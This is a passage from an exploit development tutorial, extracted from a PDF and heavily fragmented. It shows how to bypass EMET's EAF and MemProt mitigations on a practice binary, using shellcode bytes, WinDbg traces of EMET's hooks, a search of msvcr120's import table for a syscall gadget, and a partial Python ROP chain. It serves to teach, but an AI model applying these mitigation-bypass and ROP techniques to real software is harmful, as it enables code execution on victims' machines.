\
xD4"
 
+
                        
# mov    edx,esp
 
            
"
\
x64
\
xFF
\
x15
\
xC0
\
x00
\
x00
\
x00"
 
+
    
# call   dword ptr fs:[0C0h]
 
            
"
\
x81
\
xC4
\
xD8
\
x02
\
x00
\
x00"
          
# add    esp,2D8h
 
        
)
 
        
code
 
=
 
disable_EAF
 
+
 
shellcode
 
       
name
 
=
 
'a'
*
36
 
+
 
struct
.
pack
(
'<I'
,
 
ret_eip
)
 
+
 
create_rop_chain
(
len
(
code
))
 
+
 
code
 
        
f
.
write
(
name
)
 
 
write_file
(
r'c:
\
deleteme
\
name.dat'
)
 
 
If we run 
exploitme3.exe
, the calculator pops up! We bypassed EAF! We can also enable EAF+. Nothing 
changes.
 
MemPr
ot
 
In our exploit we use 
VirtualProtect
 to make the portion of the stack which contains our shellcode executable. 
MemProt should be the perfect protection against that technique. Let’s enable it for 
exploitme3.exe
. As 
expected, when we run 
exploitme3.exe
, 
MemProt stops our exploit and 
exploitme3
 crashes.
 
Let’s see what happens in WinDbg. Open 
exploitme3.exe
 in WinDbg and put a breakpoint on 
exploitme3!f
. 
Then step through the function 
f
 and after the 
ret
 instruction we should reach our ROP code. Keep steppi
ng 
until you get to the jmp to 
VirtualProtect
.
 
Here, we see something strange:
 
kernel32!VirtualProtectStub:
 
763b4327 e984c1b5c0      jmp     36f104b0     <
------------------
 is this a hook?
 
763b432c 5d              pop     ebp
 
763b432d e996cdffff      jmp 
    kernel32!VirtualProtect (763b10c8)
 
763b4332 8b0e            mov     ecx,dword ptr [esi]
 
763b4334 8908            mov     dword ptr [eax],ecx
 
763b4336 8b4e04          mov     ecx,dword ptr [esi+4]
 
763b4339 894804          mov     dword ptr [eax+4],ecx
 
7
63b433c e9e9eaffff      jmp     kernel32!LocalBaseRegEnumKey+0x292 (763b2e2a)
 
763b4341 8b85d0feffff    mov     eax,dword ptr [ebp
-
130h]
 
The function starts with a 
jmp
! 
Let’s see where it leads us to:
 
36f104b0 83ec24          sub     esp,24h
 
36f104b3 68e88b
1812      push    12188BE8h
 
36f104b8 6840208f70      push    offset EMET!EMETSendCert+0xac0 (708f2040)
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 270 
-
 
36f104bd 68d604f136      push    36F104D6h
 
36f104c2 6804000000      push    4
 
36f104c7 53              push    ebx
 
36f104c8 60              pushad
 
36f104
c9 54              push    esp
 
36f104ca e8816c9a39      call    EMET+0x27150 (708b7150)
 
36f104cf 61              popad
 
36f104d0 83c438          add     esp,38h
 
36f104d3 c21000          ret     10h
 
OK, that’s EMET. That 
jmp
 is a hook put there by EMET to in
tercept calls to 
VirtualProtect
.
 
We can see that if it weren’t for the 
hook
, the 
VirtualProtectStub
 would call 
kernel32!VirtualProtect
. Let’s 
have a look at it:
 
0:000> u kernel32!VirtualProtect
 
kernel32!VirtualProtect:
 
763b10c8 ff2518093b76    jmp     dwor
d ptr [kernel32!_imp__VirtualProtect (763b0918)]
 
763b10ce 90              nop
 
763b10cf 90              nop
 
763b10d0 90              nop
 
763b10d1 90              nop
 
763b10d2 90              nop
 
kernel32!WriteProcessMemory:
 
763b10d3 ff251c093b76    jmp     
dword ptr [kernel32!_imp__WriteProcessMemory (763b091c)]
 
763b10d9 90              nop
 
That’s just a redirection which has nothing to do with EMET:
 
0:000> u poi(763b0918)
 
KERNELBASE!VirtualProtect:
 
7625efc3 e9d815cbc0      jmp     36f105a0     <
------------
-----
 another hook from EMET
 
7625efc8 ff7514          push    dword ptr [ebp+14h]
 
7625efcb ff7510          push    dword ptr [ebp+10h]
 
7625efce ff750c          push    dword ptr [ebp+0Ch]
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 271 
-
 
7625efd1 ff7508          push    dword ptr [ebp+8]
 
7625efd4 6aff    
        push    0FFFFFFFFh
 
7625efd6 e8c1feffff      call    KERNELBASE!VirtualProtectEx (7625ee9c)
 
7625efdb 5d              pop     ebp
 
Note the hook from EMET. While 
VirtualProtect
 operates on the current process, 
VirtualProtectEx
 lets you 
specify the pro
cess you want to work on. As we can see, 
VirtualProtect
 just calls 
VirtualProtectEx
 passing 
-
1
, 
which is the value returned by 
GetCurrentProcess
, as first argument. The other arguments are the same as 
the ones passed to 
VirtualProtect
.
 
Now let’s examine 
Vi
rtualProtectEx
:
 
0:000> u KERNELBASE!VirtualProtectEx
 
KERNELBASE!VirtualProtectEx:
 
7625ee9c e97717cbc0      jmp     36f10618     <
-----------------
 another hook from EMET
 
7625eea1 56              push    esi
 
7625eea2 8b35c0112576    mov     esi,dword ptr [K
ERNELBASE!_imp__NtProtectVirtualMemory (762511c0)]
 
7625eea8 57              push    edi
 
7625eea9 ff7518          push    dword ptr [ebp+18h]
 
7625eeac 8d4510          lea     eax,[ebp+10h]
 
7625eeaf ff7514          push    dword ptr [ebp+14h]
 
7625eeb2 50    
          push    eax
 
0:000> u
 
KERNELBASE!VirtualProtectEx+0x17:
 
7625eeb3 8d450c          lea     eax,[ebp+0Ch]
 
7625eeb6 50              push    eax
 
7625eeb7 ff7508          push    dword ptr [ebp+8]
 
7625eeba ffd6            call    esi      <
-------------
------
 calls NtProtectVirtualMemory
 
7625eebc 8bf8            mov     edi,eax
 
7625eebe 85ff            test    edi,edi
 
7625eec0 7c05            jl      KERNELBASE!VirtualProtectEx+0x2b (7625eec7)
 
7625eec2 33c0            xor     eax,eax
 
Again, note the hook
 from EMET. 
VirtualProtectEx
 calls 
NtProtectVirtualMemory
:
 
0:000> u poi(KERNELBASE!_imp__NtProtectVirtualMemory)
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 272 
-
 
ntdll!ZwProtectVirtualMemory:
 
76eb0038 e9530606c0      jmp     36f10690     <
-----------------
 this is getting old...
 
76eb003d 33c9            
xor     ecx,ecx
 
76eb003f 8d542404        lea     edx,[esp+4]
 
76eb0043 64ff15c0000000  call    dword ptr fs:[0C0h]
 
76eb004a 83c404          add     esp,4
 
76eb004d c21400          ret     14h
 
ntdll!ZwQuerySection:
 
76eb0050 b84e000000      mov     eax,4Eh
 
76e
b0055 33c9            xor     ecx,ecx
 
That looks quite familiar: 
ZwProtectVirtualMemory
 calls a ring 0 service! Note that the service number has 
been overwritten by EMET’s hook, but 
0x4d
 would be a good guess since the service number of the next 
function i
s 
0x4E
.
 
If you have another look at 
VirtualProtectEx
, you’ll see that the parameters pointed to by 
EDX
 in 
ZwProtectVirtualMemory
 are not in the same format as those passed to 
VirtualProtectEx
. To have a closer 
look, let’s disable MemProt, restart (
Ctrl+Shi
ft+F5
) 
exploitme3.exe
 in WinDbg and set the following 
breakpoint:
 
bp exploitme3!f "bp KERNELBASE!VirtualProtectEx;g"
 
This will break on the call to 
VirtualProtectEx
 executed by our ROP chain. We hit 
F5
 (go) and we end up 
here:
 
KERNELBASE!VirtualProtectEx:
 
7625ee9c 8bff            mov     edi,edi      <
--------------------
 we are here!
 
7625ee9e 55              push    ebp
 
7625ee9f 8bec            mov     ebp,esp
 
7625eea1 56              push    esi
 
7625eea2 8b35c0112576    mov     esi,dword ptr [KERNELBASE!_
imp__NtProtectVirtualMemory (762511c0)]
 
7625eea8 57              push    edi
 
7625eea9 ff7518          push    dword ptr [ebp+18h]
 
7625eeac 8d4510          lea     eax,[ebp+10h]
 
7625eeaf ff7514          push    dword ptr [ebp+14h]
 
7625eeb2 50              p
ush    eax
 
7625eeb3 8d450c          lea     eax,[ebp+0Ch]
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 273 
-
 
7625eeb6 50              push    eax
 
7625eeb7 ff7508          push    dword ptr [ebp+8]
 
7625eeba ffd6            call    esi
 
This time, as expected, there’s no hook. Here are our 5 parameters on the
 stack:
 
 
Let’s see what is put onto the stack:
 
KERNELBASE!VirtualProtectEx:
 
7625ee9c 8bff            mov     edi,edi      <
--------
------------
 we are here!
 
7625ee9e 55              push    ebp
 
7625ee9f 8bec            mov     ebp,esp
 
7625eea1 56              push    esi
 
7625eea2 8b35c0112576    mov     esi,dword ptr [KERNELBASE!_imp__NtProtectVirtualMemory (762511c0)]
 
7625eea8 57    
          push    edi
 
7625eea9 ff7518          push    dword ptr [ebp+18h]      // lpflOldProtect (writable location)
 
7625eeac 8d4510          lea     eax,[ebp+10h]
 
7625eeaf ff7514          push    dword ptr [ebp+14h]      // PAGE_EXECUTE_READWRITE
 
7625eeb
2 50              push    eax                      // ptr to size
 
7625eeb3 8d450c          lea     eax,[ebp+0Ch]
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 274 
-
 
7625eeb6 50              push    eax                      // ptr to address
 
7625eeb7 ff7508          push    dword ptr [ebp+8]        // 0xffff
ffff (current process)
 
7625eeba ffd6            call    esi
 
Let’s step into the call:
 
ntdll!ZwProtectVirtualMemory:
 
76eb0038 b84d000000      mov     eax,4Dh
 
76eb003d 33c9            xor     ecx,ecx
 
76eb003f 8d542404        lea     edx,[esp+4]
 
76eb0043 64ff
15c0000000  call    dword ptr fs:[0C0h]
 
76eb004a 83c404          add     esp,4
 
76eb004d c21400          ret     14h
 
EDX
 will point to the following 5 parameters in this order:
 
0xffffffff (current process)
 
ptr to address
 
ptr to size
 
PAGE_EXECUTE_READWRITE
 
l
pflOldProtect (writable location)
 
Here’s a concrete example:
 
 
Before wasting our time with building a ROP chain that might not work
, we should make sure that there 
aren’t any other surprises.
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 275 
-
 
An easy way to do this, is to debug 
exploitme3.exe
 with MemProt enabled and overwrite the EMET’s hooks 
with the original code. If everything works fine, then we’re ready to proceed. I’ll leave yo
u this as an exercise 
(
do it!
).
 
Building the ROP chain
 
Even though we want to call a kernel service the same way we did for clearing the debug registers, this time 
it’ll be much harder because we need to do this with ROP gadgets.
 
The main problem is that 
m
svcr120.dll
 doesn’t contain any 
call dword ptr fs:[0C0h]
 or variation of it such as 
call fs:[eax]
 or 
call fs:eax
. We know that in 
ntdll
 there are lots of these calls so maybe we can find a way to 
get the address of one of them?
 
Let’s have a look at the 
IAT
 (
I
mport 
A
ddress 
T
able) of 
msvcr120.dll
:
 
0:000> !dh msvcr120
 
 
File Type: DLL
 
FILE HEADER VALUES
 
     14C machine (i386)
 
       5 number of sections
 
524F7CE6 time date stamp Sat Oct 05 04:43:50 2013
 
 
       0 file pointer to symbol table
 
       0 number of 
symbols
 
      E0 size of optional header
 
    2122 characteristics
 
            Executable
 
            App can handle >2gb addresses
 
            32 bit word machine
 
            DLL
 
 
OPTIONAL HEADER VALUES
 
     10B magic #
 
   12.00 linker version
 
   DC200 siz
e of code
 
    DC00 size of initialized data
 
       0 size of uninitialized data
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 276 
-
 
   11A44 address of entry point
 
    1000 base of code
 
         
-----
 new 
-----
 
73c60000 image base
 
    1000 section alignment
 
     200 file alignment
 
       2 subsystem (Window
s GUI)
 
    6.00 operating system version
 
   10.00 image version
 
    6.00 subsystem version
 
   EE000 size of image
 
     400 size of headers
 
   FB320 checksum
 
00100000 size of stack reserve
 
00001000 size of stack commit
 
00100000 size of heap reserve
 
00001000
 size of heap commit
 
     140  DLL characteristics
 
            Dynamic base
 
            NX compatible
 
    1860 [    CED0] address  of Export Directory
 
   E52BC [      28] address  of Import Directory
 
   E7000 [     3E8] address  of Resource Directory
 
     
  0 [       0] address  of Exception Directory
 
   E9200 [    3EA0] address  of Security Directory
 
   E8000 [    5D64] address  of Base Relocation Directory
 
   DD140 [      38] address  of Debug Directory
 
       0 [       0] address  of Description Director
y
 
       0 [       0] address  of Special Directory
 
       0 [       0] address  of Thread Storage Directory
 
   19E48 [      40] address  of Load Configuration Directory
 
       0 [       0] address  of Bound Import Directory
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 277 
-
 
   E5000 [     2BC] address  of
 Import Address Table Directory    <
------------------------
 
       0 [       0] address  of Delay Import Directory
 
       0 [       0] address  of COR20 Header Directory
 
       0 [       0] address  of Reserved Directory
 
 
[...]
 
 
0:000> dds msvcr120+E5000 
L 2bc/4
 
73d45000  76ed107b ntdll!RtlEncodePointer
 
73d45004  76ec9dd5 ntdll!RtlDecodePointer
 
73d45008  763b586e kernel32!RaiseExceptionStub
 
73d4500c  763b11c0 kernel32!GetLastErrorStub
 
73d45010  763b79d8 kernel32!FSPErrorMessages::CMessageMapper::StaticClea
nup+0xc
 
73d45014  763b3470 kernel32!GetModuleHandleWStub
 
73d45018  763b4a37 kernel32!GetModuleHandleExWStub
 
73d4501c  763b1222 kernel32!GetProcAddressStub
 
73d45020  76434611 kernel32!AreFileApisANSIStub
 
73d45024  763b18fa kernel32!MultiByteToWideCharStub
 
7
3d45028  763b16d9 kernel32!WideCharToMultiByteStub
 
73d4502c  763b5169 kernel32!GetCommandLineAStub
 
73d45030  763b51eb kernel32!GetCommandLineWStub
 
73d45034  763b1420 kernel32!GetCurrentThreadIdStub
 
73d45038  76eb22c0 ntdll!RtlEnterCriticalSection
 
73d4503c 
 76eb2280 ntdll!RtlLeaveCriticalSection
 
73d45040  76ec4625 ntdll!RtlDeleteCriticalSection
 
73d45044  763b1481 kernel32!GetModuleFileNameAStub
 
73d45048  763b11a9 kernel32!SetLastError
 
73d4504c  763b17b8 kernel32!GetCurrentThreadStub
 
73d45050  763b4918 kernel
32!GetModuleFileNameWStub
 
73d45054  763b51fd kernel32!IsProcessorFeaturePresent
 
73d45058  763b517b kernel32!GetStdHandleStub
 
73d4505c  763b1282 kernel32!WriteFileImplementation
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 278 
-
 
73d45060  763b440a kernel32!FindCloseStub
 
73d45064  764347bf kernel32!FindFirst
FileExAStub
 
73d45068  763dd52e kernel32!FindNextFileAStub
 
73d4506c  763c17d9 kernel32!FindFirstFileExWStub
 
73d45070  763b54b6 kernel32!FindNextFileWStub
 
73d45074  763b13e0 kernel32!CloseHandleImplementation
 
73d45078  763b3495 kernel32!CreateThreadStub
 
73d4
507c  76ee801c ntdll!RtlExitUserThread
 
73d45080  763b43b7 kernel32!ResumeThreadStub
 
73d45084  763b4925 kernel32!LoadLibraryExWStub
 
73d45088  763d0622 kernel32!SystemTimeToTzSpecificLocalTimeStub
 
73d4508c  763b53f4 kernel32!FileTimeToSystemTimeStub
 
73d45090
  7643487f kernel32!GetDiskFreeSpaceAStub
 
73d45094  763b5339 kernel32!GetLogicalDrivesStub
 
73d45098  763b1acc kernel32!SetErrorModeStub
 
73d4509c  764256f0 kernel32!BeepImplementation
 
73d450a0  763b10ff kernel32!SleepStub
 
73d450a4  763be289 kernel32!GetFull
PathNameAStub
 
73d450a8  763b11f8 kernel32!GetCurrentProcessIdStub
 
73d450ac  763b453c kernel32!GetFileAttributesExWStub
 
73d450b0  763cd4c7 kernel32!SetFileAttributesWStub
 
73d450b4  763b409c kernel32!GetFullPathNameWStub
 
73d450b8  763b4221 kernel32!CreateDir
ectoryWStub
 
73d450bc  763c9b05 kernel32!MoveFileExW
 
73d450c0  76434a0f kernel32!RemoveDirectoryWStub
 
73d450c4  763b4153 kernel32!GetDriveTypeWStub
 
73d450c8  763b897b kernel32!DeleteFileWStub
 
73d450cc  763be2f9 kernel32!SetEnvironmentVariableAStub
 
73d450d0 
 763c17fc kernel32!SetCurrentDirectoryAStub
 
73d450d4  763dd4e6 kernel32!GetCurrentDirectoryAStub
 
73d450d8  763c1228 kernel32!SetCurrentDirectoryWStub
 
73d450dc  763b55d9 kernel32!GetCurrentDirectoryWStub
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 279 
-
 
73d450e0  763b89b9 kernel32!SetEnvironmentVariableWSt
ub
 
73d450e4  763b1136 kernel32!WaitForSingleObject
 
73d450e8  763c1715 kernel32!GetExitCodeProcessImplementation
 
73d450ec  763b1072 kernel32!CreateProcessA
 
73d450f0  763b3488 kernel32!FreeLibraryStub
 
73d450f4  763b48db kernel32!LoadLibraryExAStub
 
73d450f8  
763b103d kernel32!CreateProcessW
 
73d450fc  763b3e93 kernel32!ReadFileImplementation
 
73d45100  763d273c kernel32!GetTempPathA
 
73d45104  763cd4ac kernel32!GetTempPathW
 
73d45108  763b1852 kernel32!DuplicateHandleImplementation
 
73d4510c  763b17d5 kernel32!GetC
urrentProcessStub
 
73d45110  763b34c9 kernel32!GetSystemTimeAsFileTimeStub
 
73d45114  763b4622 kernel32!GetTimeZoneInformationStub
 
73d45118  763b5a6e kernel32!GetLocalTimeStub
 
73d4511c  763dd4fe kernel32!LocalFileTimeToFileTimeStub
 
73d45120  763cec8b kernel3
2!SetFileTimeStub
 
73d45124  763b5a46 kernel32!SystemTimeToFileTimeStub
 
73d45128  76434a6f kernel32!SetLocalTimeStub
 
73d4512c  76ec47a0 ntdll!RtlInterlockedPopEntrySList
 
73d45130  76ec27b5 ntdll!RtlInterlockedFlushSList
 
73d45134  76ec474c ntdll!RtlQueryDept
hSList
 
73d45138  76ec4787 ntdll!RtlInterlockedPushEntrySList
 
73d4513c  763db000 kernel32!CreateTimerQueueStub
 
73d45140  763b1691 kernel32!SetEventStub
 
73d45144  763b1151 kernel32!WaitForSingleObjectExImplementation
 
73d45148  7643ebeb kernel32!UnregisterWai
t
 
73d4514c  763b11e0 kernel32!TlsGetValueStub
 
73d45150  763cf874 kernel32!SignalObjectAndWait
 
73d45154  763b14cb kernel32!TlsSetValueStub
 
73d45158  763b327b kernel32!SetThreadPriorityStub
 
73d4515c  7643462b kernel32!ChangeTimerQueueTimerStub
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 280 
-
 
73d45160  763c
f7bb kernel32!CreateTimerQueueTimerStub
 
73d45164  76432482 kernel32!GetNumaHighestNodeNumber
 
73d45168  763dcaf5 kernel32!RegisterWaitForSingleObject
 
73d4516c  76434ca1 kernel32!GetLogicalProcessorInformationStub
 
73d45170  763ccd9d kernel32!RtlCaptureStackB
ackTraceStub
 
73d45174  763b4387 kernel32!GetThreadPriorityStub
 
73d45178  763ba839 kernel32!GetProcessAffinityMask
 
73d4517c  763d0570 kernel32!SetThreadAffinityMask
 
73d45180  763b4975 kernel32!TlsAllocStub
 
73d45184  763cf7a3 kernel32!DeleteTimerQueueTimerSt
ub
 
73d45188  763b3547 kernel32!TlsFreeStub
 
73d4518c  763cefbc kernel32!SwitchToThreadStub
 
73d45190  76ec2540 ntdll!RtlTryEnterCriticalSection
 
73d45194  7643347c kernel32!SetProcessAffinityMask
 
73d45198  763b183a kernel32!VirtualFreeStub
 
73d4519c  763b1ab1 
kernel32!GetVersionExWStub
 
73d451a0  763b1822 kernel32!VirtualAllocStub
 
73d451a4  763b4327 kernel32!VirtualProtectStub
 
73d451a8  76ec9514 ntdll!RtlInitializeSListHead
 
73d451ac  763cd37b kernel32!ReleaseSemaphoreStub
 
73d451b0  763db901 kernel32!UnregisterWa
itExStub
 
73d451b4  763b48f3 kernel32!LoadLibraryW
 
73d451b8  763dd1c4 kernel32!OutputDebugStringWStub
 
73d451bc  763cd552 kernel32!FreeLibraryAndExitThreadStub
 
73d451c0  763b1245 kernel32!GetModuleHandleAStub
 
73d451c4  7643592b kernel32!GetThreadTimes
 
73d451
c8  763b180a kernel32!CreateEventWStub
 
73d451cc  763b1912 kernel32!GetStringTypeWStub
 
73d451d0  763b445b kernel32!IsValidCodePageStub
 
73d451d4  763b1768 kernel32!GetACPStub
 
73d451d8  763dd191 kernel32!GetOEMCPStub
 
73d451dc  763b5151 kernel32!GetCPInfoStub
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 281 
-
 
73d451e0  763dd1b3 kernel32!RtlUnwindStub
 
73d451e4  763b1499 kernel32!HeapFree
 
73d451e8  76ebe046 ntdll!RtlAllocateHeap
 
73d451ec  763b14b9 kernel32!GetProcessHeapStub
 
73d451f0  76ed2561 ntdll!RtlReAllocateHeap
 
73d451f4  76ec304a ntdll!RtlSizeHeap
 
73d451f8 
 7643493f kernel32!HeapQueryInformationStub
 
73d451fc  763cb153 kernel32!HeapValidateStub
 
73d45200  763b46df kernel32!HeapCompactStub
 
73d45204  7643496f kernel32!HeapWalkStub
 
73d45208  763b4992 kernel32!GetSystemInfoStub
 
73d4520c  763b4422 kernel32!VirtualQ
ueryStub
 
73d45210  763b34f1 kernel32!GetFileTypeImplementation
 
73d45214  763b4d08 kernel32!GetStartupInfoWStub
 
73d45218  763be266 kernel32!FileTimeToLocalFileTimeStub
 
73d4521c  763b5376 kernel32!GetFileInformationByHandleStub
 
73d45220  76434d61 kernel32!Pe
ekNamedPipeStub
 
73d45224  763b3f1c kernel32!CreateFileWImplementation
 
73d45228  763b1328 kernel32!GetConsoleMode
 
73d4522c  764578d2 kernel32!ReadConsoleW
 
73d45230  76458137 kernel32!GetConsoleCP
 
73d45234  763cc7df kernel32!SetFilePointerExStub
 
73d45238  76
3b4663 kernel32!FlushFileBuffersImplementation
 
73d4523c  7643469b kernel32!CreatePipeStub
 
73d45240  76434a8f kernel32!SetStdHandleStub
 
73d45244  76457e77 kernel32!GetNumberOfConsoleInputEvents
 
73d45248  76457445 kernel32!PeekConsoleInputA
 
73d4524c  7645748
b kernel32!ReadConsoleInputA
 
73d45250  763ca755 kernel32!SetConsoleMode
 
73d45254  764574ae kernel32!ReadConsoleInputW
 
73d45258  763d7a92 kernel32!WriteConsoleW
 
73d4525c  763cce06 kernel32!SetEndOfFileStub
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 282 
-
 
73d45260  763dd56c kernel32!LockFileExStub
 
73d45264
  763dd584 kernel32!UnlockFileExStub
 
73d45268  763b4a25 kernel32!IsDebuggerPresentStub
 
73d4526c  763d76f7 kernel32!UnhandledExceptionFilter
 
73d45270  763b8791 kernel32!SetUnhandledExceptionFilter
 
73d45274  763b18e2 kernel32!InitializeCriticalSectionAndSpin
CountStub
 
73d45278  763cd7d2 kernel32!TerminateProcessStub
 
73d4527c  763b110c kernel32!GetTickCountStub
 
73d45280  763cca32 kernel32!CreateSemaphoreW
 
73d45284  763b89d1 kernel32!SetConsoleCtrlHandler
 
73d45288  763b16f1 kernel32!QueryPerformanceCounterStub
 
7
3d4528c  763b51ab kernel32!GetEnvironmentStringsWStub
 
73d45290  763b5193 kernel32!FreeEnvironmentStringsWStub
 
73d45294  763d34a7 kernel32!GetDateFormatW
 
73d45298  763cf451 kernel32!GetTimeFormatW
 
73d4529c  763b3b8a kernel32!CompareStringWStub
 
73d452a0  763
b1785 kernel32!LCMapStringWStub
 
73d452a4  763b3c02 kernel32!GetLocaleInfoWStub
 
73d452a8  763cce1e kernel32!IsValidLocaleStub
 
73d452ac  763b3d65 kernel32!GetUserDefaultLCIDStub
 
73d452b0  7643479f kernel32!EnumSystemLocalesWStub
 
73d452b4  763db297 kernel32!O
utputDebugStringAStub
 
73d452b8  00000000
 
I examined the 
ntdll
 functions one by one until I found a viable candidate: 
ntdll!RtlExitUserThread
.
 
Let’s examine it:
 
ntdll!RtlExitUserThread:
 
76ee801c 8bff            mov     edi,edi
 
76ee801e 55              push 
   ebp
 
76ee801f 8bec            mov     ebp,esp
 
76ee8021 51              push    ecx
 
76ee8022 56              push    esi
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 283 
-
 
76ee8023 33f6            xor     esi,esi
 
76ee8025 56              push    esi
 
76ee8026 6a04            push    4
 
76ee8028 8d45fc      
    lea     eax,[ebp
-
4]
 
76ee802b 50              push    eax
 
76ee802c 6a0c            push    0Ch
 
76ee802e 6afe            push    0FFFFFFFEh
 
76ee8030 8975fc          mov     dword ptr [ebp
-
4],esi
 
76ee8033 e8d07bfcff      call    ntdll!NtQueryInformationTh
read (76eafc08)      <
-------------------
 
Now let’s examine 
ntdll!NtQueryInformationThread
:
 
ntdll!NtQueryInformationThread:
 
76eafc08 b822000000      mov     eax,22h
 
76eafc0d 33c9            xor     ecx,ecx
 
76eafc0f 8d542404        lea     edx,[esp+4]
 
76eaf
c13 64ff15c0000000  call    dword ptr fs:[0C0h]
 
76eafc1a 83c404          add     esp,4
 
76eafc1d c21400          ret     14h
 
Perfect! Now how do we determine the address of that 
call dword ptr fs:[0C0h]
?
 
We know the address of 
ntdll!RtlExitUserThread
 becaus
e it’s at a fixed RVA in the IAT of 
msvcr120
. At the 
address 
ntdll!RtlExitUserThread+0x17
 we have the call to 
ntdll!NtQueryInformationThread
. That call has this 
format:
 
here:
 
  E8 offset
 
and the target address is
 
here + offset + 5
 
In the ROP we will determ
ine the address of 
ntdll!NtQueryInformationThread
 as follows:
 
EAX = 0x7056507c          ; ptr to address of ntdll!RtlExitUserThread (IAT)
 
EAX = [EAX]               ; address of ntdll!RtlExitUserThread
 
EAX += 0x18               ; address of "offset" compone
nt of call to ntdll!NtQueryInformationThread
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 284 
-
 
EAX += [EAX] + 4          ; address of ntdll!NtQueryInformationThread
 
EAX += 0xb                ; address of "call dword ptr fs:[0C0h] # add esp,4 # ret 14h"
 
We’re ready to build the ROP chain! As always, we’ll 
use mona:
 
.load pykd.pyd
 
!py mona rop 
-
m msvcr120
 
Here’s the full Python script:
 
Python
 
 
import
 
struct
 
 
msvcr120
 
=
 
0x73c60000
 
 
# Delta used to fix the addresses based on the new base address of msvcr120.dll.
 
md
 
=
 
msvcr120
 
-
 
0x70480000
 
 
def
 
create_rop_
chain
(
code_size
):
 
    
rop_gadgets
 
=
 
[
 
        
# ecx = esp
 
        
md
 
+
 
0x704af28c
,
     
# POP ECX # RETN    ** [MSVCR120.dll] **   |   {PAGE_EXECUTE_READ}
 
        
0xffffffff
,
 
        
md
 
+
 
0x70532761
,
     
# AND ECX,ESP # RETN    ** [MSVCR120.dll] **   |  asc
iiprint,ascii {PAGE_EXECUTE_READ}
 
 
# ecx = args+8 (&endAddress)
 
        
md
 
+
 
0x704f4681
,
     
# POP EBX # RETN    ** [MSVCR120.dll] **   |   {PAGE_EXECUTE_READ}
 
        
75
*
4
,
 
        
md
 
+
 
0x7054b28e
,
     
# ADD ECX,EBX # POP EBP # OR AL,0D9 # INC EB
P # OR AL,5D # RETN    ** [MSVCR120.dll] **   |   
{PAGE_EXECUTE_READ}
 
        
0x11111111
,
 
 
# address = ptr to address
 
        
md
 
+
 
0x704f2487
,
     
# MOV EAX,ECX # RETN    ** [MSVCR120.dll] **   |   {PAGE_EXECUTE_READ}
 
        
md
 
+
 
0x704846b4
,
     
# XCHG EAX,EDX # RETN    ** [MSVCR120.dll] **   |   {PAGE_EXECUTE_READ}
 
        
md
 
+
 
0x704e986b
,
     
# MOV DWORD PTR [ECX],EDX # POP EBP # RETN 0x04    ** [MSVCR120.dll] **   |   
{PAGE_EXECUTE_READ}
 
        
0x11111111
,
 
        
md
 
+
 
0x7048f607
,
     
# RETN (
ROP NOP) [MSVCR120.dll]
 
        
0x11111111
,
          
# for RETN 0x04
 
 
# ecx = args+4 (ptr to &address)
 
        
md
 
+
 
0x704f4681
,
     
# POP EBX # RETN    ** [MSVCR120.dll] **   |   {PAGE_EXECUTE_READ}
 
        
0xfffffff0
,
 
        
md
 
+
 
0x7054b28e
,
    
 
# ADD ECX,EBX # POP EBP # OR AL,0D9 # INC EBP # OR AL,5D # RETN    ** [MSVCR120.dll] **   |   
{PAGE_EXECUTE_READ}
 
        
0x11111111
,
 
 
# &address = ptr to address
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 285 
-
 
        
md
 
+
 
0x704e986b
,
     
# MOV DWORD PTR [ECX],EDX # POP EBP # RETN 0x04    ** 
[MSVCR120.dll] **   |   
{PAGE_EXECUTE_READ}
 
        
0x11111111
,
 
        
md
 
+
 
0x7048f607
,
     
# RETN (ROP NOP) [MSVCR120.dll]
 
        
0x11111111
,
          
# for RETN 0x04
 
 
# ecx = args+8 (ptr to &size)
 
        
md
 
+
 
0x705370e0
,
     
# INC ECX # RETN 
   ** [MSVCR120.dll] **   |   {PAGE_EXECUTE_READ}
 
        
md
 
+
 
0x705370e0
,
     
# INC ECX # RETN    ** [MSVCR120.dll] **   |   {PAGE_EXECUTE_READ}
 
        
md
 
+
 
0x705370e0
,
     
# INC ECX # RETN    ** [MSVCR120.dll] **   |   {PAGE_EXECUTE_READ}
 
        
md
 
+
 
0
x705370e0
,
     
# INC ECX # RETN    ** [MSVCR120.dll] **   |   {PAGE_EXECUTE_READ}
 
 
# edx = ptr to size
 
        
md
 
+
 
0x704e4ffe
,
     
# INC EDX # RETN    ** [MSVCR120.dll] **   |   {PAGE_EXECUTE_READ}
 
        
md
 
+
 
0x704e4ffe
,
     
# INC EDX # RETN   
 ** [MSVCR120.dll] **   |   {PAGE_EXECUTE_READ}
 
        
md
 
+
 
0x704e4ffe
,
     
# INC EDX # RETN    ** [MSVCR120.dll] **   |   {PAGE_EXECUTE_READ}
 
        
md
 
+
 
0x704e4ffe
,
     
# INC EDX # RETN    ** [MSVCR120.dll] **   |   {PAGE_EXECUTE_READ}
 
 
# &siz
e = ptr to size
 
        
md
 
+
 
0x704e986b
,
     
# MOV DWORD PTR [ECX],EDX # POP EBP # RETN 0x04    ** [MSVCR120.dll] **   |   
